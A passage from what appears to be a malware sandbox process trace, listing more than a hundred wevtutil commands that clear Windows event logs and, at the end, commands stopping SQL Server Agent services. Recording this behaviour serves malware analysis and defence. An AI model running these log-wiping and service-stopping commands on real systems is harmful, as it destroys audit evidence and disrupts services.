      wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
      4⤵
      PID:2072
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
      4⤵
      PID:2340
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
      4⤵
      PID:2544
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
      4⤵
      PID:2200
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
      4⤵
      PID:3284
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
      4⤵
      PID:2484
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
      4⤵
      PID:2368
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
      4⤵
      PID:2364
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
      4⤵
      PID:2260
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:1064
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
      4⤵
      PID:3388
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
      4⤵
      PID:1680
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
      4⤵
      PID:1480
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
      4⤵
      PID:2392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
      4⤵
      PID:2472
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
      4⤵
      PID:1264
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
      4⤵
      PID:1916
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
      4⤵
      PID:2316
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
      4⤵
      PID:2248
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
      4⤵
      PID:1392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
      4⤵
      PID:3420
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
      4⤵
      PID:2144
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
      4⤵
      PID:2240
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
      4⤵
      Clears Windows event logs
      PID:1056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
      4⤵
      PID:1084
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
      4⤵
      PID:3380
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
      4⤵
      Clears Windows event logs
      PID:2468
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
      4⤵
      Clears Windows event logs
      PID:3384
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
      4⤵
      PID:2220
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
      4⤵
      PID:3408
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
      4⤵
      PID:3436
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
      4⤵
      PID:1628
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
      4⤵
      PID:3444
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
      4⤵
      PID:1200
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
      4⤵
      PID:2308
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
      4⤵
      PID:1048
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
      4⤵
      PID:544
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
      4⤵
      PID:3476
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
      4⤵
      PID:360
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
      4⤵
      PID:3472
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
      4⤵
      PID:1924
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
      4⤵
      PID:212
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
      4⤵
      PID:3512
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
      4⤵
      PID:3504
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
      4⤵
      PID:3536
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
      4⤵
      PID:3524
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
      4⤵
      PID:236
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
      4⤵
      PID:2804
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
      4⤵
      PID:3544
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
      4⤵
      PID:3552
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
      4⤵
      PID:3568
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:3464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
      4⤵
      PID:3652
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
      4⤵
      PID:3636
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
      4⤵
      PID:3660
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
      4⤵
      Clears Windows event logs
      PID:3676
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
      4⤵
      PID:3692
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
      4⤵
      PID:3668
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
      4⤵
      PID:3624
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
      4⤵
      PID:3736
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
      4⤵
      PID:3748
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
      4⤵
      PID:3712
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
      4⤵
      PID:3620
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
      4⤵
      Clears Windows event logs
      PID:3720
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
      4⤵
      Clears Windows event logs
      PID:3768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
      4⤵
      PID:3804
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
      4⤵
      PID:3796
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
      4⤵
      PID:3776
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
      4⤵
      PID:3800
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
      4⤵
      Clears Windows event logs
      PID:3852
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
      4⤵
      PID:3844
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
      4⤵
      PID:3920
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
      4⤵
      PID:3888
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
      4⤵
      PID:3948
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
      4⤵
      PID:3988
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
      4⤵
      PID:3956
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
      4⤵
      PID:3900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
      4⤵
      PID:3952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
      4⤵
      PID:4068
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
      4⤵
      Clears Windows event logs
      PID:3964
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
      4⤵
      PID:4088
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
      4⤵
      PID:2852
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
      4⤵
      Clears Windows event logs
      PID:2764
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
      4⤵
      Clears Windows event logs
      PID:3104
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
      4⤵
      PID:2896
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
      4⤵
      PID:2908
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
      4⤵
      PID:3120
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
      4⤵
      Clears Windows event logs
      PID:3128
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
      4⤵
      PID:2776
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
      4⤵
      PID:2964
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
      4⤵
      PID:2808
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
      4⤵
      PID:2880
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
      4⤵
      PID:2800
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
      4⤵
      PID:2192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
      4⤵
      PID:2820
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
      4⤵
      Clears Windows event logs
      PID:2188
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
      4⤵
      PID:1724
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
      4⤵
      PID:2568
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
      4⤵
      PID:2792
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
      4⤵
      PID:2692
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
      4⤵
      PID:888
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
      4⤵
      PID:2184
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
      4⤵
      PID:2128
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
      4⤵
      PID:1388
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Help/Operational"
      4⤵
      PID:2952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
      4⤵
      PID:900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
      4⤵
      PID:792
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
      4⤵
      PID:3076
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
      4⤵
      PID:1476
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
      4⤵
      PID:1408
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
      4⤵
      PID:964
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
      4⤵
      PID:2204
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
      4⤵
      PID:3176
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
      4⤵
      Clears Windows event logs
      PID:2092
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
      4⤵
      Clears Windows event logs
      PID:3180
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
      4⤵
      PID:3244
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
      4⤵
      PID:3204
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
      4⤵
      PID:1636
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-International/Operational"
      4⤵
      PID:592
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
      4⤵
      PID:1820
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
      4⤵
      Clears Windows event logs
      PID:852
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
      4⤵
      PID:3248
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
      4⤵
      PID:3276
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
      4⤵
      PID:2956
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
      4⤵
      PID:3236
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
      4⤵
      PID:1744
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
      4⤵
      PID:2948
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
      4⤵
      PID:2884
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
      4⤵
      PID:3304
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
      4⤵
      PID:3292
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
      4⤵
      PID:2592
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
      4⤵
      PID:2336
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
      4⤵
      PID:3036
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
      4⤵
      PID:3016
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
      4⤵
      Clears Windows event logs
      PID:2508
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
      4⤵
      PID:2536
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
      4⤵
      PID:2232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
      4⤵
      PID:2320
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
      4⤵
      PID:2148
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
      4⤵
      PID:3220
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
      4⤵
      PID:2344
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
      4⤵
      PID:1716
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
      4⤵
      PID:2480
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
      4⤵
      PID:1340
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
      4⤵
      PID:1228
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
      4⤵
      PID:2264
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
      4⤵
      PID:2960
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
      4⤵
      PID:2840
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
      4⤵
      Clears Windows event logs
      PID:2548
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
      4⤵
      PID:2304
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
      4⤵
      PID:3372
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
      4⤵
      Clears Windows event logs
      PID:1016
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
      4⤵
      PID:2784
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
      4⤵
      PID:1824
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:2844
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
      4⤵
      PID:3368
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
      4⤵
      PID:1156
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
      4⤵
      PID:788
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
      4⤵
      PID:3432
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
      4⤵
      PID:3428
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
      4⤵
      PID:2504
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
      4⤵
      PID:2412
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
      4⤵
      PID:2224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
      4⤵
      Clears Windows event logs
      PID:3448
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
      4⤵
      PID:1524
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
      4⤵
      PID:2116
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
      4⤵
      Clears Windows event logs
      PID:468
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
      4⤵
      PID:3452
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
      4⤵
      PID:2836
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
      4⤵
      PID:2212
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
      4⤵
      PID:2112
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
      4⤵
      PID:1008
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
      4⤵
      PID:1684
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
      4⤵
      PID:3484
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
      4⤵
      PID:3496
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
      4⤵
      PID:3328
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
      4⤵
      PID:208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
      4⤵
      PID:3508
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
      4⤵
      PID:228
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
      4⤵
      PID:2928
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
      4⤵
      PID:224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
      4⤵
      PID:3588
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
      4⤵
      PID:3584
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
      4⤵
      PID:2652
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
      4⤵
      PID:3572
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
      4⤵
      Clears Windows event logs
      PID:1364
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
      4⤵
      PID:556
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
      4⤵
      PID:3612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
      4⤵
      Clears Windows event logs
      PID:3640
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
      4⤵
      PID:3708
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
      4⤵
      PID:3596
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:3684
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
      4⤵
      PID:3704
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
      4⤵
      PID:3600
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
      4⤵
      Clears Windows event logs
      PID:1928
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
      4⤵
      PID:3628
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
      4⤵
      PID:532
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
      4⤵
      PID:3732
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
      4⤵
      PID:3784
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
      4⤵
      PID:3764
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"
    3⤵
    PID:4020
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SBSMONITORING"
      4⤵
      PID:4068
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"
        5⤵
        
        PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"
    3⤵
